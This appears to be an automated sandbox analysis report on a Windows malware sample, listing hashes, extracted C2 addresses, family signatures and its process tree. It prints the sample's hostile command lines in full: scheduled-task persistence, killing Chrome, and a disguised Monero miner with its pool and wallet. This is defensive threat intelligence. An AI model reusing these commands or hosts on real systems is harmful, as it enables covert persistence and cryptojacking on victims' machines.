Analysis
-
max time kernel
1s -
max time network
113s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
31-12-2023 04:28
Static task
static1
Behavioral task
behavioral1
Sample
28253286098972f1fe91412ef99a759a.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
28253286098972f1fe91412ef99a759a.exe
Resource
win10v2004-20231215-en
General
-
Target
28253286098972f1fe91412ef99a759a.exe
-
Size
5.9MB
-
MD5
28253286098972f1fe91412ef99a759a
-
SHA1
c5f51069a3f9270d79bacff246b0ca86887b98c6
-
SHA256
4d04f5f44c21f9ccda28433bddea30ce2fba7a548d7d40a46332e0d2b70079d0
-
SHA512
6373384150ec0dcf916d776a09a900092ff95a3f47e10684a8b43bbd200e2817ec6d89eb7e2da0dfac64a4535acda26b101b97d580ae4d8199cbe89c75b5bd29
-
SSDEEP
98304:RohD0nge1EtzppRfNAlG9H3bZGjiwwRk7v:RohrgEpBNAlwH3siwwab
Malware Config
Extracted
socelars
http://www.iyiqian.com/
http://www.xxhufdc.top/
http://www.uefhkice.xyz/
http://www.fcektsy.top/
Extracted
gcleaner
194.145.227.161
Signatures
-
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
-
Socelars payload 2 IoCs
resource yara_rule behavioral1/files/0x0034000000016247-16.dat family_socelars behavioral1/files/0x0034000000016247-19.dat family_socelars -
OnlyLogger payload 2 IoCs
resource yara_rule behavioral1/memory/2796-57-0x0000000000220000-0x000000000024F000-memory.dmp family_onlylogger behavioral1/memory/2796-58-0x0000000000400000-0x0000000002CD1000-memory.dmp family_onlylogger -
Executes dropped EXE 4 IoCs
pid Process 2460 Chrome 5.exe 2820 1.exe 2764 2.exe 2616 3.exe -
Loads dropped DLL 4 IoCs
pid Process 2580 28253286098972f1fe91412ef99a759a.exe 2580 28253286098972f1fe91412ef99a759a.exe 2580 28253286098972f1fe91412ef99a759a.exe 2580 28253286098972f1fe91412ef99a759a.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 1900 2580 WerFault.exe 20 -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2728 schtasks.exe 2904 schtasks.exe -
Kills process with taskkill 1 IoCs
pid Process 1960 taskkill.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 2580 wrote to memory of 2460 2580 28253286098972f1fe91412ef99a759a.exe 37 PID 2580 wrote to memory of 2460 2580 28253286098972f1fe91412ef99a759a.exe 37 PID 2580 wrote to memory of 2460 2580 28253286098972f1fe91412ef99a759a.exe 37 PID 2580 wrote to memory of 2460 2580 28253286098972f1fe91412ef99a759a.exe 37 PID 2580 wrote to memory of 2820 2580 28253286098972f1fe91412ef99a759a.exe 36 PID 2580 wrote to memory of 2820 2580 28253286098972f1fe91412ef99a759a.exe 36 PID 2580 wrote to memory of 2820 2580 28253286098972f1fe91412ef99a759a.exe 36 PID 2580 wrote to memory of 2820 2580 28253286098972f1fe91412ef99a759a.exe 36 PID 2580 wrote to memory of 2764 2580 28253286098972f1fe91412ef99a759a.exe 35 PID 2580 wrote to memory of 2764 2580 28253286098972f1fe91412ef99a759a.exe 35 PID 2580 wrote to memory of 2764 2580 28253286098972f1fe91412ef99a759a.exe 35 PID 2580 wrote to memory of 2764 2580 28253286098972f1fe91412ef99a759a.exe 35 PID 2580 wrote to memory of 2616 2580 28253286098972f1fe91412ef99a759a.exe 28 PID 2580 wrote to memory of 2616 2580 28253286098972f1fe91412ef99a759a.exe 28 PID 2580 wrote to memory of 2616 2580 28253286098972f1fe91412ef99a759a.exe 28 PID 2580 wrote to memory of 2616 2580 28253286098972f1fe91412ef99a759a.exe 28
Processes
-
C:\Users\Admin\AppData\Local\Temp\28253286098972f1fe91412ef99a759a.exe"C:\Users\Admin\AppData\Local\Temp\28253286098972f1fe91412ef99a759a.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2580 -
C:\Users\Admin\AppData\Local\Temp\3.exe"C:\Users\Admin\AppData\Local\Temp\3.exe"2⤵
- Executes dropped EXE
PID:2616
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2580 -s 10402⤵
- Program crash
PID:1900
-
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"2⤵PID:1336
-
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"2⤵PID:2796
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"2⤵
- Executes dropped EXE
PID:2764 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe3⤵PID:2196
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe4⤵
- Kills process with taskkill
PID:1960
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1.exe"C:\Users\Admin\AppData\Local\Temp\1.exe"2⤵
- Executes dropped EXE
PID:2820
-
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"2⤵
- Executes dropped EXE
PID:2460 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit3⤵PID:2612
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'4⤵
- Creates scheduled task(s)
PID:2728
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"3⤵PID:2932
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit4⤵PID:2108
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'5⤵
- Creates scheduled task(s)
PID:2904
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"4⤵PID:2976
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth4⤵PID:1572
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe" -a1⤵PID:3048
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD59411539a57162cad8a5bf5e9fcc6a4e3
SHA11d2ee9520c2ef9d28954f1138c7fbe06be9ee8af
SHA256d74fcd762195a549babab75e9c345413a4bc31c359c230239dc000acd209bc48
SHA51215e1869faf11a05504849a6ceba5b44b8aefbfaed8532d52e1a61d5c7ca4a3609d4aa084537ef4699c6bceb14904c9a0356954211e79f0e57299bfea3e616872
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD526cf8a27e9764e2bf5c33cc3c3b6146a
SHA1805e2cc783c4cf2ffa9acd32a258e3abfbe00a18
SHA256d6f2dc3319420090c3718391fe1afa1847cba44ccc9004e9bd4274d9f3fb0c52
SHA5124264993b3574047b16dc12d1e71a02a02912d14822faf520cbab5499c5b4c6b04be9b025a68db97c74b02b3a11890fc55665cd7ca39180290a7a70d5d57b4d3f
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5ff58d8d778138b8e21f3390eda189848
SHA1df7f772480798a22bf1ad75e74b4c9245379881a
SHA2565a715cf53d42bf9c14c00b5bcf6fe717340226a38e4b573a081689196c2e21db
SHA5124e0c01584f90ba11f93f8def696bfd27efd2506aa0880c744756bb9fcd66755d957b7df8d9005ad03d303e7501f3302a128e479df25fee229a0aabad92ddbbd9
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5b93adc6121abee060e7cf77bc2807b41
SHA18557dbfa8021764b3ad59370a37a83f9aaf8ad13
SHA256668b938ea6cd702591fb5577ee4632f515470244696b357f193da01a26616df4
SHA512cfa48873b6a46239501ba7f9c38b27339a626e1de7aadfa720e0e9f7a90ca6ed9acaf334d5729bf768d315124a81bdbee8c9e0cb8c6b9ec411b30b580b15274f
-
Filesize
57KB
MD5ffc8b6b93ef3081fd457a59c8b8b5e6e
SHA17422bd7a6d970ee284d3f69e7e59c80102a7d06a
SHA256b20879f7bd009a985788679808e1d043d9e885fb53f8e6c51b9852051f720859
SHA512dd86f33f2e7b84aa8de4997a077cab44c4e37a04723c786459baf588adc4e51b3a59f3e602769117cd30f7df7b74f8b5997176ab4a5b9934f7b29d0bef8e12c6
-
Filesize
86KB
MD57fa68a16ad9ca5c5af38e909a48651ad
SHA170b87d7c14a553e8e25d20f80de95974b7d796e5
SHA256935d7f9b04f2a348e6c7ca4ec1c70a6127b699f259344b446405242a7ecba2bb
SHA512aad961bd5d62611ea70e86b9b282bb5b2ca2197f6d80f46d410b4d0a819e1957c164e5d8b28a4163a575a16ee184312cff2a43990a3d1e8ccd3d1294ac79b9e3
-
Filesize
92KB
MD5413f1431660529cfe9015e83cbc6ca72
SHA15c6fa6e2335b2f230ac8f49cf3d42ade8ef4306e
SHA2564f49ea0efaf8dd264c4602b24b56b0a616c278ea16676e8cf43302859758b34c
SHA5122e7307a4934059967ee9fa0389c38d1f0b739bb478b6740eb6964e39d4e017788c2dc02b5e0965d6254ce64a890d9c51e7a2a94ff171500fb99121ef8f40f885
-
Filesize
10KB
MD5b8d24656126ba086e27ea821519ac0ea
SHA168aa6bfe92a402dbad986941145bb6af9829c671
SHA256f96320c237012700083b3e14e25cd99a44a57280bac30b35656a67ce63a88625
SHA5124c47958faa2ad0de00a4f901b6817fcbe794df5fbe66aba6c6776aa1359739ab90a93ed4194d9e092b22c2deb0b3be303766e0cd8431e1b03fc5ed844d4a8415
-
Filesize
33KB
MD5064d6c89385febcead4f45bbb64ff651
SHA1f1b035dd4f8015ff378b5c41c06cd9363d902324
SHA2562048ff6aac6db0798c764d3465094d9e7d20049385057cccdc08f5e2cbf7c41f
SHA5121cedf638214e7c0a9adf31c33a93c0cba4a8eb733944d35d2f91f7ba5c8191a3882e3502dc3b836fd983304e119d6c13c2087b25c494bcf1d8e75c597b74111b
-
Filesize
56KB
MD5e511bb4cf31a2307b6f3445a869bcf31
SHA176f5c6e8df733ac13d205d426831ed7672a05349
SHA25656002017746f61eee8d8e9b5ad2f3cbb119dc99300c5b6d32c1be184d3e25137
SHA5129c81de34bf3b0eb75405c726d641ef6090054e9be8e0c0ab1bb2ed095e6477ce2fa8996868bf8a77a720b210a76b5f4e1b3b086d7f40449d79498681b367199c
-
Filesize
48KB
MD58a2f288f24f47393ea59c938691bf9ea
SHA1a4d0bcb7593f96db4244dffc57c562faa6d5e48e
SHA25673815d0e0ead35ac8c92da78befd1876bde39594e0db325114fe286373dac856
SHA5126bf9f86d1b1226e25d2bc5cb4d9bbd0fa04d308656b40b4ea220ef3043efbfe0790dcf852a9e1c89f0939c96afe97cefe1ebc31b62a2cb113331d81a8d4fa986
-
Filesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
Filesize
43KB
MD593460c75de91c3601b4a47d2b99d8f94
SHA1f2e959a3291ef579ae254953e62d098fe4557572
SHA2560fdba84fe8ed2cf97023c544d3f0807dbb12840c8e7d445a3a4f55174d78b5b2
SHA5124370ae1a1fc10c91593839c51d0fbae5c0838692f95e03cac315882b026e70817b238f7fe7d9897049856469b038acc8ccfd73aae1af5775bfef35bde2bf7856
-
Filesize
9KB
MD58f2e6c21dfb255df2858d72f82d8cd3f
SHA17138764419cd0bebac32cb7e0f9ef310c0cb9815
SHA256bb32de61fcb28263ee379532eda08ea4447f3dc88f17aecbe180ed15da0a5134
SHA51274c2c0396cbf99015ab077e0215acd516ac6ccf40e353d2f4915d27139594e6bad1df9fd98910752139292eba3006944697d6b42c0bdfa93ee4a7a007322331b
-
Filesize
57KB
MD54db7cd84eb37e95f5d650c14ca8ba643
SHA132ffa96c4a05331fbbe7feaa44f566cdf883ee27
SHA256e6a9130a951b7d2d5278c6ae074ea08df360fd4c593a61317a1621f02c766ab9
SHA51210c3cb6b30c492e03e0af2c7d8d53cc15d6578957f1b67a97f6ea58cd8cdea3ced4a6adceb9f58981933f5b95aeda1a3a96a712367aacec79b64ab93dc2f8aca
-
Filesize
7KB
MD5339347f8a4bc7137b6a6a485f6cd0688
SHA19b198dc642f9f32ea38884d47c1fe7d8868e3f39
SHA256c6f8eec2d3204bad0712705405fdb09555bf2bc26f83f0cf1d7966b86a46f601
SHA51204c73aa7cff15895daf42119873df920e2ee9500d1293f470ad590cbd9cccf09f6df206f1aa9fa09e744f404f5365174f570a7f33a9a642453531dcfbaeb26fd
-
Filesize
69KB
MD5a18ae8237fb09b29698ebd5876fd2ea8
SHA11246abff12e0afd139e220aa72bdc40038c03118
SHA25600d44b799be736ae1f2bcfa51e498096520c2285a3a3f860d6e97355c2b38b1d
SHA512647c111e3454ae0897a3534d5d8638a7baee30fc58ff8e6d807dd9c3e080e85968e689f5f9cba878938a41d2741943fb942d3cb5b4241f971f5140d9db870aff
-
Filesize
17KB
MD55ed65edeead31a1fd7271b90fc0f3052
SHA133b88c1a22ff746ac55bb6469f8062d287be351b
SHA25679827e53cb6781b6bcea2b5b3aa7c58cc27a54b4de711b7a2c091298ae21471f
SHA5124d98fbdee167cc5861d05f40f1376582bb68b53fd2b428482ebc201852b25a68b6c644e17e2e91b6203faaa234b42e396889f43f36bd4480f91702d7464d50f6
-
Filesize
8KB
MD51b1c69d5c0d49864bc4bba1f247a8556
SHA1559697da5e69a02cda1ead4807d18781fcd1bb6e
SHA25616ef79d4071c1eda75a320c22b58a54dc1e3b45553fa2209747d279f39f02a44
SHA512399b665d0cb1706a3515f8f098394434430ec1707f627e46d6e45b6879ed9375a0b733aae68bf5592c0bfacbc171e371961071f303e4ee756f1b960bcd7b2842
-
Filesize
98KB
MD5f0829f21a7134600e2b75624b5154fc0
SHA18cf9a3c7d6c528a2381a1f760e3538d1d2190f1f
SHA256d644ad9eb643fb7dfbfb1b55b61e9af0925adb71e034d20c2f7cb062a5d279c7
SHA512ca1131c0fa76ff80eeceba7fdc20cbe2135523f085b4096ad0da35e473f222247a4d2013a7b25286df15af29b8ff8f37a143770e754e898adf37a8eabb9d23eb
-
Filesize
63KB
MD54799b4ee37f0be56f37f3966d2bc19b9
SHA116f5c7fff6fa1508abed1dfce0bdc5e474b983bd
SHA256bd0f8a54f8a541b04dde3b9a78e20ba030a1232207d4d08c08a9e72bd3d922d1
SHA51204eec8e70056238c578fd127508624b7fafc08cd8754cb3f846f6302f7b7b113943ed051e147ae5ac495e414229233156327b030c7ec6250b4ae50e2fbacad51
-
Filesize
41KB
MD5918969ea5d7339ecb17cd6a505a666e6
SHA155740212100390df28fb9ad115803f1c4ba53c23
SHA25683091e0be525fbb1325daa6a378db3a35d5a26a29d6857dede122dc87bce6605
SHA512cf0491bddf025606803891d2ea21ad79d39bf4973b5f1ae24bd983544c71977d9916bc4bf5a87848f315a2bf5fed028e56372464087ac2b86c40c405ad2c10f3
-
Filesize
41KB
MD5688595ef8922eca05281ffb29d102ecd
SHA15b9cd93a459262d0e4691ff70c4b29d26cfe7e59
SHA25667287524cc46d87454e61a36fbdf52399757d5f442b08a6b7b23f0b46fd983be
SHA5129773bed6982a6072b90b1e32b345d50d5e7603a5a391d717db1a95a4d7c1d243cb428318593cf95b83882be0fd2e2f18771928cb64bbb3abd6c55ada7deeac5e